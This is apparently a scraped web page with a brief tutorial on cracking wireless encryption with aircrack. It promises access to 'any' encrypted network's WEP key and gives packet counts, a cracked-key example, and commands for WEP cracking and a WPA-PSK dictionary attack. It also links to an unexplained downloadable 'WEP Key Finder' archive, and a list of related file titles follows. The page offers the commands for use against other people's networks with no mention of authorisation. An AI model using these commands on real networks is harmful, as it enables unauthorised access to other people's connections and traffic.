Get WEP Key of Encrypted Wireless Connection




Get WEP Key of Encrypted Wireless Connection




This will allow you to retrieve WEP key for any Encrypted Wireless internet.

How many packets do I need?

Approximately 300,000 packets for breaking 64-bit WEP

Approximately 1,000,000 packets for breaking 128-bit WEP

aircrack -q -n 128 -b 11:11:11:11:11:11 capture1-01.cap

The WEP key 86:65:78:38:8F:51:7B:E0:B4:81:8A:0D:B1 was cracked in under 10 seconds. aircrack is very quick, it is the capture process using airodump that takes the majority of the time in WEP cracking.

Breaking WPA:

Once the WPA handshake has been collected (see aireplay) we can perform a dictionary attack to determine the WPA-PSK (Pre-Shared-Key)

aircrack -a 2 -w passwords.txt capture1-01.cap

aircrack Usage:

aircrack provides us with a wealth of options (type aircrack or visit project homepage for full listing):
*
-a [mode 1 or 2] 1=WEP, 2=WPA-PSK
*
-e [essid] target selection network ID
*
-b [bssid] target access point's MAC
*
-q enable quiet mode
*
-w [path] path to a dictionary word list (WPA only)
*
-n [no. bits] WEP key length (64, 128, 152 or 256)
*
-f [fudge no.] defaults are 5 for 64 bit WEP and 2 for 128 bit WEP

Examples:

aircrack -a 1 -n 64 capture1-01.cap

Runs aircrack against the capture1-01.cap file in 64 bit WEP cracking mode

aircrack -q -b 00:06:25:BF:46:06 -n 128 -f 4 testfile-01.cap

Runs aircrack in quiet mode against the testfile-01.cap file in 128 bit WEP cracking mode with a fudge factor of 4

aircrack -a 2 -w passwords.txt capture1-01.cap

Runs aircrack against the capture1-01.cap file in WPA-PSK dictionary attack mode





Code:
http://rapidshare.com/files/12074493/WiFi_WEP_Key_Finder.rar







Wyszukiwarka

Podobne podstrony:
Wireless WEP Key Password Spy 1 1 Portable rar
function mcrypt module get algo key size
The Key of Kilenya
function mcrypt enc get supported key sizes
function mcrypt enc get supported key sizes
can t get you out of my head
function mcrypt module get supported key sizes
function mcrypt module get supported key sizes
Simple Control Scheme of PWM Converter Connecting Wind Turbine
key measures of testb253EE4
connection of 2 mapsensors PL
Dynamic Performance of a Microturbine Connected to a Low Voltage Network

więcej podobnych podstron